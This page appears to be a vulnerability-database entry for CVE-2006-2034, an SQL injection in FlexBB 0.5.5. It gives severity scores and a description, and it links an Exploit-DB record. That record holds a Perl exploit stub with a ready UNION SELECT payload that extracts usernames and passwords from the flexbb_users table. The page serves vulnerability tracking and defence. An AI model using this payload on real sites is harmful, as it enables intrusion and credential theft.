CVE-2006-2034
Published 2006-04-26
Priority P339 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.31% (81.2th percentile)
SQL injection vulnerability in function/showprofile.php in FlexBB 0.5.5 allows remote attackers to execute arbitrary SQL commands, and view all usernames and passwords, via the id parameter to the showprofile page in index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexbb | flexbb | — | — |
No detection rules found.
Exploit-DB
BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities
exploitdb·2006-07-18
CVE-2006-3561 BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities
---
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2034.tgz (07182006-btvoyager.tgz)
# milw0rm.com [2006-07-18]
Exploit-DB
FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection
exploitdb·2006-04-24
CVE-2006-2034 FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection
---
```perl
#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
# 1- First Do Login
# 2- View This Link :D
#
# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
# Div The PHP Security Fucking Tool :D
##-- Start --#
$host = "127.0.0.1";
$path = "/flexbb/";
$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
```
No writeups or analysis indexed.
Published: 2006-04-26